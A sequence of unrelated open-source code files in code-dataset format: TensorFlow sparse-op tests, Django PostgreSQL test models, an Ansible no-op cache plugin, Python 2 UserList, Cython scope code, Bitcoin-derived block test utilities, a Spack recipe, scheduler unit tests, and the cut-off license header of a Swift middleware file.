      sparse_row_envelope = sess.run(
          sparse_ops.sparse_row_envelope(sparse_input))
      self.assertAllEqual(expected_sparse_row_envelope,
                          sparse_row_envelope)

  def test_sparse_row_envelope_unsorted_indices(self):
    # Same expected result as above: input index order must not matter.
    expected_sparse_row_envelope = [1, 0, 3]
    with self.test_session() as sess:
      sparse_input = sparse_tensor.SparseTensor(
          indices=[[2, 0], [2, 2], [2, 1], [0, 0]],
          values=[0, 1, 2, 3],
          dense_shape=[3, 3])
      sparse_row_envelope = sess.run(
          sparse_ops.sparse_row_envelope(sparse_input))
      self.assertAllEqual(expected_sparse_row_envelope,
                          sparse_row_envelope)

  def test_sparse_row_envelope_empty_in_the_end(self):
    # Trailing fully-empty rows must still appear as zeros.
    expected_sparse_row_envelope = [1, 0, 3, 0, 0]
    with self.test_session() as sess:
      sparse_input = sparse_tensor.SparseTensor(
          indices=[[0, 0], [2, 0], [2, 1], [2, 2]],
          values=[0, 1, 2, 3],
          dense_shape=[5, 3])
      sparse_row_envelope = sess.run(
          sparse_ops.sparse_row_envelope(sparse_input))
      self.assertAllEqual(expected_sparse_row_envelope,
                          sparse_row_envelope)

  def test_sparse_row_envelope_empty_3d(self):
    # Explicit row/column axis arguments (1, 2) on a 3-D input.
    expected_sparse_row_envelope = [1, 0, 3, 0, 0]
    with self.test_session() as sess:
      sparse_input = sparse_tensor.SparseTensor(
          indices=[[0, 0, 0], [0, 2, 0], [0, 2, 1], [0, 2, 2]],
          values=[0, 1, 2, 3],
          dense_shape=[1, 5, 3])
      sparse_row_envelope = sess.run(
          sparse_ops.sparse_row_envelope(sparse_input, 1, 2))
      self.assertAllEqual(expected_sparse_row_envelope,
                          sparse_row_envelope)
class IndicatorToSparseIdsTest(test.TestCase):
  """Tests for `sparse_ops.indicators_to_sparse_ids`.

  The fixtures show the result stores, per row, the column positions of
  the set (non-zero / non-ignore-value) indicator entries, as a ragged
  SparseTensor.
  """

  def test_indicators_to_sparse_ids_1d(self):
    indicators = (0, 0, 1, 0)
    sparse_ids = sparse_ops.indicators_to_sparse_ids(indicators)
    with self.test_session():
      _assert_sparse_tensor_value(self, sparse_tensor.SparseTensorValue(
          indices=((0,),),
          values=(2,),
          dense_shape=(1,),
      ), sparse_ids.eval())

  def test_indicators_to_sparse_ids_2d(self):
    indicators = (
        (0, 0, 1, 0),
        (1, 0, 0, 1),
    )
    sparse_ids = sparse_ops.indicators_to_sparse_ids(indicators)
    with self.test_session():
      _assert_sparse_tensor_value(self, sparse_tensor.SparseTensorValue(
          indices=((0, 0), (1, 0), (1, 1)),
          values=(2, 0, 3),
          dense_shape=(2, 2),
      ), sparse_ids.eval())

  def test_indicators_to_sparse_ids_3d(self):
    indicators = (
        ((0, 0, 1, 0, 0), (0, 0, 0, 0, 0)),
        ((1, 0, 0, 1, 0), (0, 0, 1, 0, 0)),
        ((0, 0, 0, 0, 0), (0, 0, 0, 0, 0)),
        ((1, 0, 0, 1, 1), (0, 0, 1, 0, 0)),
    )
    sparse_ids = sparse_ops.indicators_to_sparse_ids(indicators)
    with self.test_session():
      # dense_shape's last dim (3) is the max number of set indicators
      # found in any single row.
      _assert_sparse_tensor_value(self, sparse_tensor.SparseTensorValue(
          indices=(
              (0, 0, 0),
              (1, 0, 0), (1, 0, 1), (1, 1, 0),
              (3, 0, 0), (3, 0, 1), (3, 0, 2), (3, 1, 0)
          ), values=(
              2,
              0, 3, 2,
              0, 3, 4, 2
          ), dense_shape=(4, 2, 3),
      ), sparse_ids.eval())

  def test_int16_to_sparse_ids_2d(self):
    indicators = (
        (0, 0, 1, 0),
        (1, 0, 0, 1),
    )
    # The dtype argument controls the dtype of the resulting id values.
    sparse_ids = sparse_ops.indicators_to_sparse_ids(
        indicators, dtype=dtypes.int16)
    with self.test_session():
      _assert_sparse_tensor_value(self, sparse_tensor.SparseTensorValue(
          indices=((0, 0), (1, 0), (1, 1)),
          values=np.array((2, 0, 3), dtype=np.int16),
          dense_shape=(2, 2),
      ), sparse_ids.eval())

  def test_indicators_to_sparse_ids_ignore_value(self):
    indicators = (
        ((-1, -1, 10, -1), (-1, -1, -1, -1)),
        ((11, -1, -1, 12), (-1, -1, 13, -1)),
    )
    sparse_ids = sparse_ops.indicators_to_sparse_ids(
        indicators, ignore_value=-1)
    with self.test_session():
      _assert_sparse_tensor_value(self, sparse_tensor.SparseTensorValue(
          indices=((0, 0, 0), (1, 0, 0), (1, 0, 1), (1, 1, 0)),
          values=(2, 0, 3, 2),
          dense_shape=(2, 2, 2),
      ), sparse_ids.eval())

  def test_string_indicators_to_sparse_ids(self):
    # For string inputs the empty string is the implicit ignore value.
    indicators = (
        (('', '', 'A', ''), ('', '', '', '')),
        (('B', '', '', 'C'), ('', '', 'D', '')),
    )
    sparse_ids = sparse_ops.indicators_to_sparse_ids(indicators)
    with self.test_session():
      _assert_sparse_tensor_value(self, sparse_tensor.SparseTensorValue(
          indices=((0, 0, 0), (1, 0, 0), (1, 0, 1), (1, 1, 0)),
          values=(2, 0, 3, 2),
          dense_shape=(2, 2, 2),
      ), sparse_ids.eval())

  def test_string_indicators_to_sparse_ids_ignore_value(self):
    indicators = (
        (('x', 'x', 'A', 'x'), ('x', 'x', 'x', 'x')),
        (('B', 'x', 'x', 'C'), ('x', 'x', 'D', 'x')),
    )
    sparse_ids = sparse_ops.indicators_to_sparse_ids(
        indicators, ignore_value='x')
    with self.test_session():
      _assert_sparse_tensor_value(self, sparse_tensor.SparseTensorValue(
          indices=((0, 0, 0), (1, 0, 0), (1, 0, 1), (1, 1, 0)),
          values=(2, 0, 3, 2),
          dense_shape=(2, 2, 2),
      ), sparse_ids.eval())

  def test_indicators_to_sparse_ids_unknown_3d_shape(self):
    indicators_values = (
        ((0, 0, 1, 0), (0, 0, 0, 0)),
        ((1, 0, 0, 1), (0, 0, 1, 0)),
    )
    indicators = array_ops.placeholder(
        dtype=dtypes.int32, shape=(None, None, None))
    sparse_ids = sparse_ops.indicators_to_sparse_ids(indicators)
    with self.test_session():
      _assert_sparse_tensor_value(self, sparse_tensor.SparseTensorValue(
          indices=((0, 0, 0), (1, 0, 0), (1, 0, 1), (1, 1, 0)),
          values=(2, 0, 3, 2),
          dense_shape=(2, 2, 2),
      ), sparse_ids.eval(feed_dict={indicators: indicators_values}))

  def test_indicators_to_sparse_ids_unknown_rank(self):
    indicators_values = (
        ((0, 0, 1, 0), (0, 0, 0, 0)),
        ((1, 0, 0, 1), (0, 0, 1, 0)),
    )
    indicators = array_ops.placeholder(dtype=dtypes.int32)
    sparse_ids = sparse_ops.indicators_to_sparse_ids(indicators)
    with self.test_session():
      _assert_sparse_tensor_value(self, sparse_tensor.SparseTensorValue(
          indices=((0, 0, 0), (1, 0, 0), (1, 0, 1), (1, 1, 0)),
          values=(2, 0, 3, 2),
          dense_shape=(2, 2, 2),
      ), sparse_ids.eval(feed_dict={indicators: indicators_values}))
if __name__ == '__main__':
  test.main()  # run all test cases via the TensorFlow test runner
| apache-2.0 |
epandurski/django | tests/postgres_tests/models.py | 50 | 3528 | from django.db import connection, models
from .fields import (
ArrayField, BigIntegerRangeField, DateRangeField, DateTimeRangeField,
FloatRangeField, HStoreField, IntegerRangeField, JSONField,
)
class PostgreSQLModel(models.Model):
    # Abstract base: concrete subclasses are only created/used when the
    # database vendor is PostgreSQL.
    class Meta:
        abstract = True
        required_db_vendor = 'postgresql'
# Models exercising ArrayField over a variety of base field types.
class IntegerArrayModel(PostgreSQLModel):
    field = ArrayField(models.IntegerField())


class NullableIntegerArrayModel(PostgreSQLModel):
    field = ArrayField(models.IntegerField(), blank=True, null=True)


class CharArrayModel(PostgreSQLModel):
    field = ArrayField(models.CharField(max_length=10))


class DateTimeArrayModel(PostgreSQLModel):
    datetimes = ArrayField(models.DateTimeField())
    dates = ArrayField(models.DateField())
    times = ArrayField(models.TimeField())


class NestedIntegerArrayModel(PostgreSQLModel):
    # Array of arrays -- maps to a multidimensional PostgreSQL array.
    field = ArrayField(ArrayField(models.IntegerField()))


class OtherTypesArrayModel(PostgreSQLModel):
    ips = ArrayField(models.GenericIPAddressField())
    uuids = ArrayField(models.UUIDField())
    decimals = ArrayField(models.DecimalField(max_digits=5, decimal_places=2))


class HStoreModel(PostgreSQLModel):
    field = HStoreField(blank=True, null=True)


# Plain models.Model (not PostgreSQLModel): usable on any database vendor.
class CharFieldModel(models.Model):
    field = models.CharField(max_length=16)


class TextFieldModel(models.Model):
    field = models.TextField()
# Only create this model for postgres >= 9.2
# (range types were introduced in PostgreSQL 9.2).
if connection.vendor == 'postgresql' and connection.pg_version >= 90200:
    class RangesModel(PostgreSQLModel):
        ints = IntegerRangeField(blank=True, null=True)
        bigints = BigIntegerRangeField(blank=True, null=True)
        floats = FloatRangeField(blank=True, null=True)
        timestamps = DateTimeRangeField(blank=True, null=True)
        dates = DateRangeField(blank=True, null=True)

    class RangeLookupsModel(PostgreSQLModel):
        parent = models.ForeignKey(RangesModel, blank=True, null=True)
        integer = models.IntegerField(blank=True, null=True)
        big_integer = models.BigIntegerField(blank=True, null=True)
        float = models.FloatField(blank=True, null=True)
        timestamp = models.DateTimeField(blank=True, null=True)
        date = models.DateField(blank=True, null=True)
else:
    # create an object with this name so we don't have failing imports
    class RangesModel(object):
        pass

    class RangeLookupsModel(object):
        pass
# Only create this model for postgres >= 9.4
# (the jsonb type used by JSONField was introduced in PostgreSQL 9.4).
if connection.vendor == 'postgresql' and connection.pg_version >= 90400:
    class JSONModel(models.Model):
        field = JSONField(blank=True, null=True)
else:
    # create an object with this name so we don't have failing imports
    class JSONModel(object):
        pass
class ArrayFieldSubclass(ArrayField):
    # Intentionally ignores *args/**kwargs and always wraps an IntegerField;
    # presumably used to test field deconstruction for subclasses --
    # NOTE(review): confirm callers never pass meaningful arguments here.
    def __init__(self, *args, **kwargs):
        super(ArrayFieldSubclass, self).__init__(models.IntegerField())
class AggregateTestModel(models.Model):
    """
    To test postgres-specific general aggregation functions
    """
    # Fields are nullable/blank so aggregates can be exercised over NULLs.
    char_field = models.CharField(max_length=30, blank=True)
    integer_field = models.IntegerField(null=True)
    boolean_field = models.NullBooleanField()
class StatTestModel(models.Model):
    """
    To test postgres-specific aggregation functions for statistics
    """
    int1 = models.IntegerField()
    int2 = models.IntegerField()
    # Link back to AggregateTestModel so joined aggregates can be tested.
    related_field = models.ForeignKey(AggregateTestModel, null=True)
class NowTestModel(models.Model):
    # NULL until explicitly set; presumably used to test the database
    # Now() function -- NOTE(review): confirm against the test module.
    when = models.DateTimeField(null=True, default=None)
| bsd-3-clause |
KohlsTechnology/ansible | test/integration/targets/gathering_facts/cache_plugins/none.py | 159 | 1114 | # (c) 2014, Brian Coca, Josh Drake, et al
# (c) 2017 Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
from ansible.plugins.cache import BaseCacheModule
DOCUMENTATION = '''
cache: none
short_description: write-only cache (no cache)
description:
- No caching at all
version_added: historical
author: core team (@ansible-core)
'''
class CacheModule(BaseCacheModule):
    """Write-only cache: accepts every operation but never stores anything.

    ``self.empty`` stays an empty dict for the plugin's lifetime, so every
    read is a miss and every write is discarded.
    """

    def __init__(self, *args, **kwargs):
        self.empty = {}

    def get(self, key):
        # Always a miss: nothing is ever stored.
        return self.empty.get(key)

    def set(self, key, value):
        # Deliberately does not store; just echo the value back.
        return value

    def keys(self):
        return self.empty.keys()

    def contains(self, key):
        return key in self.empty

    def delete(self, key):
        # BUG FIX: was `del self.emtpy[key]` (attribute typo), which raised
        # AttributeError on every call.  Since nothing is ever stored,
        # deletion is a safe no-op on the empty dict.
        self.empty.pop(key, None)

    def flush(self):
        self.empty = {}

    def copy(self):
        return self.empty.copy()

    def __getstate__(self):
        return self.copy()

    def __setstate__(self, data):
        self.empty = data
google/google-ctf | third_party/edk2/AppPkg/Applications/Python/Python-2.7.2/Lib/UserList.py | 67 | 3732 | """A more or less complete user-defined wrapper around list objects."""
import collections
class UserList(collections.MutableSequence):
    """A list-like wrapper keeping its contents in the real list ``self.data``.

    NOTE(review): this is Python 2 code -- it relies on ``cmp`` and the
    ``__getslice__``/``__setslice__``/``__delslice__`` slice protocol,
    both of which no longer exist in Python 3.
    """
    def __init__(self, initlist=None):
        self.data = []
        if initlist is not None:
            # XXX should this accept an arbitrary sequence?
            if type(initlist) == type(self.data):
                self.data[:] = initlist
            elif isinstance(initlist, UserList):
                self.data[:] = initlist.data[:]
            else:
                self.data = list(initlist)
    def __repr__(self): return repr(self.data)
    # Rich comparisons delegate to the underlying list, unwrapping
    # UserList operands via __cast so UserList-vs-UserList works.
    def __lt__(self, other): return self.data <  self.__cast(other)
    def __le__(self, other): return self.data <= self.__cast(other)
    def __eq__(self, other): return self.data == self.__cast(other)
    def __ne__(self, other): return self.data != self.__cast(other)
    def __gt__(self, other): return self.data >  self.__cast(other)
    def __ge__(self, other): return self.data >= self.__cast(other)
    def __cast(self, other):
        # Unwrap a UserList operand to its raw list; pass others through.
        if isinstance(other, UserList): return other.data
        else: return other
    def __cmp__(self, other):
        return cmp(self.data, self.__cast(other))
    __hash__ = None # Mutable sequence, so not hashable
    def __contains__(self, item): return item in self.data
    def __len__(self): return len(self.data)
    def __getitem__(self, i): return self.data[i]
    def __setitem__(self, i, item): self.data[i] = item
    def __delitem__(self, i): del self.data[i]
    def __getslice__(self, i, j):
        # Old-style slice protocol: negative bounds are clamped to 0.
        i = max(i, 0); j = max(j, 0)
        return self.__class__(self.data[i:j])
    def __setslice__(self, i, j, other):
        i = max(i, 0); j = max(j, 0)
        if isinstance(other, UserList):
            self.data[i:j] = other.data
        elif isinstance(other, type(self.data)):
            self.data[i:j] = other
        else:
            self.data[i:j] = list(other)
    def __delslice__(self, i, j):
        i = max(i, 0); j = max(j, 0)
        del self.data[i:j]
    def __add__(self, other):
        # Concatenation always returns a new instance of self's class.
        if isinstance(other, UserList):
            return self.__class__(self.data + other.data)
        elif isinstance(other, type(self.data)):
            return self.__class__(self.data + other)
        else:
            return self.__class__(self.data + list(other))
    def __radd__(self, other):
        if isinstance(other, UserList):
            return self.__class__(other.data + self.data)
        elif isinstance(other, type(self.data)):
            return self.__class__(other + self.data)
        else:
            return self.__class__(list(other) + self.data)
    def __iadd__(self, other):
        # In-place concatenation mutates self.data and returns self.
        if isinstance(other, UserList):
            self.data += other.data
        elif isinstance(other, type(self.data)):
            self.data += other
        else:
            self.data += list(other)
        return self
    def __mul__(self, n):
        return self.__class__(self.data*n)
    __rmul__ = __mul__
    def __imul__(self, n):
        self.data *= n
        return self
    # The mutating list API simply forwards to the underlying list.
    def append(self, item): self.data.append(item)
    def insert(self, i, item): self.data.insert(i, item)
    def pop(self, i=-1): return self.data.pop(i)
    def remove(self, item): self.data.remove(item)
    def count(self, item): return self.data.count(item)
    def index(self, item, *args): return self.data.index(item, *args)
    def reverse(self): self.data.reverse()
    def sort(self, *args, **kwds): self.data.sort(*args, **kwds)
    def extend(self, other):
        if isinstance(other, UserList):
            self.data.extend(other.data)
        else:
            self.data.extend(other)
| apache-2.0 |
FusionSP/android_external_chromium_org | third_party/cython/src/Cython/Compiler/CythonScope.py | 99 | 5817 | from Symtab import ModuleScope
from PyrexTypes import *
from UtilityCode import CythonUtilityCode
from Errors import error
from Scanning import StringSourceDescriptor
import MemoryView
class CythonScope(ModuleScope):
    """Symbol-table scope for the magic ``cython`` builtin module."""
    is_cython_builtin = 1
    _cythonscope_initialized = False

    def __init__(self, context):
        ModuleScope.__init__(self, u'cython', None, None)
        self.pxd_file_loaded = True
        self.populate_cython_scope()
        # The Main.Context object
        self.context = context

        # Predeclare the built-in fused types as typedef entries.
        for fused_type in (cy_integral_type, cy_floating_type, cy_numeric_type):
            entry = self.declare_typedef(fused_type.name,
                                         fused_type,
                                         None,
                                         cname='<error>')
            entry.in_cinclude = True

    def lookup_type(self, name):
        # This function should go away when types are all first-level objects.
        type = parse_basic_type(name)
        if type:
            return type
        return super(CythonScope, self).lookup_type(name)

    def lookup(self, name):
        entry = super(CythonScope, self).lookup(name)
        if entry is None and not self._cythonscope_initialized:
            # Lazily populate the full scope on the first failed lookup.
            self.load_cythonscope()
            entry = super(CythonScope, self).lookup(name)
        return entry

    def find_module(self, module_name, pos):
        error("cython.%s is not available" % module_name, pos)

    def find_submodule(self, module_name):
        entry = self.entries.get(module_name, None)
        if not entry:
            self.load_cythonscope()
            entry = self.entries.get(module_name, None)
        if entry and entry.as_module:
            return entry.as_module
        else:
            # TODO: fix find_submodule control flow so that we're not
            # expected to create a submodule here (to protect CythonScope's
            # possible immutability). Hack ourselves out of the situation
            # for now.
            raise error((StringSourceDescriptor(u"cython", u""), 0, 0),
                        "cython.%s is not available" % module_name)

    def lookup_qualified_name(self, qname):
        # ExprNode.as_cython_attribute generates qnames and we untangle it here...
        name_path = qname.split(u'.')
        scope = self
        while len(name_path) > 1:
            scope = scope.lookup_here(name_path[0]).as_module
            del name_path[0]
            if scope is None:
                return None
        else:
            # while/else: reached when the loop exhausts name_path normally;
            # resolve the final component in the innermost scope found.
            return scope.lookup_here(name_path[0])

    def populate_cython_scope(self):
        # These are used to optimize isinstance in FinalOptimizePhase
        type_object = self.declare_typedef(
            'PyTypeObject',
            base_type = c_void_type,
            pos = None,
            cname = 'PyTypeObject')
        type_object.is_void = True
        type_object_type = type_object.type
        self.declare_cfunction(
            'PyObject_TypeCheck',
            CFuncType(c_bint_type, [CFuncTypeArg("o", py_object_type, None),
                                    CFuncTypeArg("t", c_ptr_type(type_object_type), None)]),
            pos = None,
            defining = 1,
            cname = 'PyObject_TypeCheck')

    def load_cythonscope(self):
        """
        Creates some entries for testing purposes and entries for
        cython.array() and for cython.view.*.
        """
        if self._cythonscope_initialized:
            return
        self._cythonscope_initialized = True
        cython_testscope_utility_code.declare_in_scope(
            self, cython_scope=self)
        cython_test_extclass_utility_code.declare_in_scope(
            self, cython_scope=self)
        #
        # The view sub-scope
        #
        self.viewscope = viewscope = ModuleScope(u'view', self, None)
        self.declare_module('view', viewscope, None).as_module = viewscope
        viewscope.is_cython_builtin = True
        viewscope.pxd_file_loaded = True
        cythonview_testscope_utility_code.declare_in_scope(
            viewscope, cython_scope=self)
        view_utility_scope = MemoryView.view_utility_code.declare_in_scope(
            self.viewscope, cython_scope=self,
            whitelist=MemoryView.view_utility_whitelist)
        # self.entries["array"] = view_utility_scope.entries.pop("array")
def create_cython_scope(context):
    """Create a fresh CythonScope bound to the given Main.Context."""
    # One could in fact probably make it a singleton,
    # but not sure yet whether any code mutates it (which would kill reusing
    # it across different contexts)
    return CythonScope(context)
# Load test utilities for the cython scope
def load_testscope_utility(cy_util_name, **kwargs):
    """Load a named utility from TestCythonScope.pyx as CythonUtilityCode."""
    return CythonUtilityCode.load(cy_util_name, "TestCythonScope.pyx", **kwargs)
undecorated_methods_protos = UtilityCode(proto=u"""
/* These methods are undecorated and have therefore no prototype */
static PyObject *__pyx_TestClass_cdef_method(
struct __pyx_TestClass_obj *self, int value);
static PyObject *__pyx_TestClass_cpdef_method(
struct __pyx_TestClass_obj *self, int value, int skip_dispatch);
static PyObject *__pyx_TestClass_def_method(
PyObject *self, PyObject *value);
""")
cython_testscope_utility_code = load_testscope_utility("TestScope")
test_cython_utility_dep = load_testscope_utility("TestDep")
cython_test_extclass_utility_code = \
load_testscope_utility("TestClass", name="TestClass",
requires=[undecorated_methods_protos,
test_cython_utility_dep])
cythonview_testscope_utility_code = load_testscope_utility("View.TestScope")
| bsd-3-clause |
ivansib/sibcoin | qa/rpc-tests/test_framework/blocktools.py | 1 | 3918 | #!/usr/bin/env python3
# blocktools.py - utilities for manipulating blocks and transactions
# Copyright (c) 2015-2016 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
from .mininode import *
from .script import CScript, OP_TRUE, OP_CHECKSIG
# Create a block (with regtest difficulty)
def create_block(hashprev, coinbase, nTime=None):
    """Build a CBlock on top of `hashprev` containing only `coinbase`.

    If `nTime` is None the block is timestamped 10 minutes in the future.
    """
    block = CBlock()
    if nTime is None:
        import time
        block.nTime = int(time.time()+600)
    else:
        block.nTime = nTime
    block.hashPrevBlock = hashprev
    block.nBits = 0x207fffff # Will break after a difficulty adjustment...
    block.vtx.append(coinbase)
    block.hashMerkleRoot = block.calc_merkle_root()
    block.calc_sha256()
    return block
def serialize_script_num(value):
    """Encode an integer as a CScriptNum: little-endian sign-magnitude bytes.

    Zero encodes as an empty bytearray; if the most significant byte has
    its top bit set, an extra byte is appended to hold the sign.
    """
    encoded = bytearray(0)
    if value == 0:
        return encoded
    negative = value < 0
    magnitude = abs(value)
    while magnitude:
        encoded.append(int(magnitude & 0xff))
        magnitude >>= 8
    if encoded[-1] & 0x80:
        # Top bit already used by magnitude: add a sign byte.
        encoded.append(0x80 if negative else 0)
    elif negative:
        encoded[-1] |= 0x80
    return encoded
# Create a coinbase transaction, assuming no miner fees.
# If pubkey is passed in, the coinbase output will be a P2PK output;
# otherwise an anyone-can-spend output.
def create_coinbase(height, pubkey = None, dip4_activated=False):
    """Build a regtest coinbase transaction paying the full subsidy at `height`."""
    coinbase = CTransaction()
    coinbase.vin.append(CTxIn(COutPoint(0, 0xffffffff),
                        ser_string(serialize_script_num(height)), 0xffffffff))
    coinbaseoutput = CTxOut()
    coinbaseoutput.nValue = 500 * COIN
    halvings = int(height/150) # regtest
    coinbaseoutput.nValue >>= halvings
    if (pubkey != None):
        coinbaseoutput.scriptPubKey = CScript([pubkey, OP_CHECKSIG])
    else:
        coinbaseoutput.scriptPubKey = CScript([OP_TRUE])
    coinbase.vout = [ coinbaseoutput ]
    if dip4_activated:
        # DIP4: mark as a special transaction (type 5) carrying a CbTx payload.
        coinbase.nVersion = 3
        coinbase.nType = 5
        cbtx_payload = CCbTx(1, height, 0)
        coinbase.vExtraPayload = cbtx_payload.serialize()
    coinbase.calc_sha256()
    return coinbase
# Create a transaction.
# If the scriptPubKey is not specified, make it anyone-can-spend.
def create_transaction(prevtx, n, sig, value, scriptPubKey=CScript()):
    """Spend output `n` of `prevtx` into a single output of `value`.

    NOTE(review): the `CScript()` default is a shared mutable default
    argument; safe only as long as callers never mutate it.
    """
    tx = CTransaction()
    assert(n < len(prevtx.vout))
    tx.vin.append(CTxIn(COutPoint(prevtx.sha256, n), sig, 0xffffffff))
    tx.vout.append(CTxOut(value, scriptPubKey))
    tx.calc_sha256()
    return tx
def get_legacy_sigopcount_block(block, fAccurate=True):
    """Sum the legacy sigop counts of every transaction in `block`."""
    return sum(get_legacy_sigopcount_tx(tx, fAccurate) for tx in block.vtx)
def get_legacy_sigopcount_tx(tx, fAccurate=True):
    """Count legacy sigops across a transaction's outputs and inputs."""
    output_count = sum(txout.scriptPubKey.GetSigOpCount(fAccurate)
                       for txout in tx.vout)
    # scriptSig might be of type bytes, so convert to CScript for the moment
    input_count = sum(CScript(txin.scriptSig).GetSigOpCount(fAccurate)
                      for txin in tx.vin)
    return output_count + input_count
# Identical to GetMasternodePayment in C++ code
def get_masternode_payment(nHeight, blockValue):
    """Return the masternode share of `blockValue` at block height `nHeight`.

    Mirrors GetMasternodePayment in the C++ code, including the quirk that
    the nMNPIPeriod*8 step is skipped (the schedule jumps from 7 to 9).
    """
    nMNPIBlock = 350
    nMNPIPeriod = 10
    # (period multiple, divisor) pairs applied on top of the base 1/5 share.
    schedule = ((0, 20), (1, 20), (2, 20), (3, 40), (4, 40),
                (5, 40), (6, 40), (7, 40), (9, 40))
    payment = int(blockValue / 5)
    for step, divisor in schedule:
        if nHeight > nMNPIBlock + nMNPIPeriod * step:
            payment += int(blockValue / divisor)
    return payment
| mit |
krafczyk/spack | var/spack/repos/builtin/packages/r-dorng/package.py | 5 | 2249 | ##############################################################################
# Copyright (c) 2013-2018, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, tgamblin@llnl.gov, All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/spack/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack import *
class RDorng(RPackage):
    """Provides functions to perform reproducible parallel foreach loops,
    using independent random streams as generated by L'Ecuyer's combined
    multiple-recursive generator
    [L'Ecuyer (1999), <doi:10.1287/opre.47.1.159>]. It enables to easily
    convert standard %dopar% loops into fully reproducible loops,
    independently of the number of workers, the task scheduling strategy,
    or the chosen parallel environment and associated foreach backend."""

    homepage = "https://cran.rstudio.com/web/packages/doRNG/index.html"
    url = "https://cran.rstudio.com/src/contrib/doRNG_1.6.6.tar.gz"
    list_url = "https://cran.r-project.org/src/contrib/Archive/doRNG"

    # Second argument is the md5 checksum of the release tarball.
    version('1.6.6', 'ffb26024c58c8c99229470293fbf35cf')

    # Runtime R package dependencies (mirror the DESCRIPTION Imports field).
    depends_on('r-foreach', type=('build', 'run'))
    depends_on('r-rngtools', type=('build', 'run'))
    depends_on('r-iterators', type=('build', 'run'))
    depends_on('r-pkgmaker', type=('build', 'run'))
| lgpl-2.1 |
pebble/flotilla | src/test/scheduler/test_scheduler.py | 2 | 4117 | import unittest
from mock import MagicMock, ANY
from collections import defaultdict
from boto.dynamodb2.items import Item
from flotilla.db import DynamoDbLocks
from flotilla.scheduler.scheduler import FlotillaScheduler
from flotilla.scheduler.db import FlotillaSchedulerDynamo
SERVICE = 'test'
REVISION = 'rev1'
REVISION2 = 'rev2'
class TestFlotillaScheduler(unittest.TestCase):
    """Unit tests for FlotillaScheduler against mocked DB and lock backends."""

    def setUp(self):
        self.db = MagicMock(spec=FlotillaSchedulerDynamo)
        # Assignments come back grouped by revision; default to "none".
        self.db.get_instance_assignments.return_value = defaultdict(list)
        self.locks = MagicMock(spec=DynamoDbLocks)
        self.scheduler = FlotillaScheduler(self.db, self.locks)
        self.scheduler.active = True

    def test_loop_not_active(self):
        # An inactive scheduler must not touch the database at all.
        self.scheduler.active = False
        self.scheduler.loop()
        self.db.get_all_revision_weights.assert_not_called()
        self.db.get_instance_assignments.assert_not_called()

    def test_loop_no_services(self):
        self.scheduler.loop()
        self.db.get_instance_assignments.assert_not_called()

    def test_loop_service_without_revisions(self):
        self.db.get_all_revision_weights.return_value = {
            SERVICE: {}
        }
        self.scheduler.loop()

    def test_loop_assignments_no_instances(self):
        self.db.get_all_revision_weights.return_value = {SERVICE: {REVISION: 1}}
        self.scheduler.loop()
        self.db.set_assignments.assert_not_called()

    def test_loop_assignments(self):
        self.db.get_all_revision_weights.return_value = {SERVICE: {REVISION: 1}}
        assignment = MagicMock(spec=Item)
        # One unassigned instance (key None) should get scheduled.
        self.db.get_instance_assignments.return_value[None].append(assignment)
        self.scheduler.loop()
        self.db.set_assignments.assert_called_with(ANY)

    def test_loop_assignments_reassign(self):
        self.db.get_all_revision_weights.return_value = {SERVICE: {REVISION: 1}}
        assignment = MagicMock(spec=Item)
        # Bare defaultdict access seeds an empty "unassigned" bucket.
        self.db.get_instance_assignments.return_value[None]
        self.db.get_instance_assignments.return_value[REVISION2].append(
            assignment)
        self.scheduler.loop()
        self.db.set_assignments.assert_called_with(ANY)

    def test_loop_assignments_reassign_partial(self):
        self.db.get_all_revision_weights.return_value = {
            SERVICE: {REVISION: 1, REVISION2: 1}}
        assignment = MagicMock(spec=Item)
        self.db.get_instance_assignments.return_value[None]
        for i in range(2):
            self.db.get_instance_assignments.return_value[REVISION2].append(
                assignment)
        self.scheduler.loop()
        self.db.set_assignments.assert_called_with(ANY)

    def test_instance_targets(self):
        targets = self.scheduler._instance_targets({REVISION: 1}, 1)
        self.assertEqual(1, len(targets))
        self.assertEqual(1, targets[REVISION])

    def test_instance_targets_rounding(self):
        # 3 instances over two equal weights: rounding gives a 1/2 split.
        targets = self.scheduler._instance_targets({REVISION: 1, REVISION2: 1},
                                                   3)
        self.assertEqual(2, len(targets))
        self.assertEqual(1, targets[REVISION])
        self.assertEqual(2, targets[REVISION2])

    def test_lock_acquire(self):
        self.scheduler.active = False
        self.locks.try_lock.return_value = True
        self.scheduler.lock()
        self.assertTrue(self.scheduler.active)

    def test_lock_release(self):
        self.locks.try_lock.return_value = False
        self.scheduler.lock()
        self.assertFalse(self.scheduler.active)

    def test_schedule_service_not_active(self):
        self.scheduler.active = False
        self.scheduler.schedule_service(SERVICE)
        self.db.get_revision_weights.assert_not_called()
        self.db.get_instance_assignments.assert_not_called()

    def test_schedule_service(self):
        weights = {REVISION: 1, REVISION2: 1}
        self.db.get_revision_weights.return_value = weights
        self.scheduler._schedule_service = MagicMock()
        self.scheduler.schedule_service(SERVICE)
        self.scheduler._schedule_service.assert_called_with(SERVICE, weights)
| mit |
levythu/swift | swift/common/middleware/cname_lookup.py | 29 | 6766 | # Copyright (c) 2010-2012 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
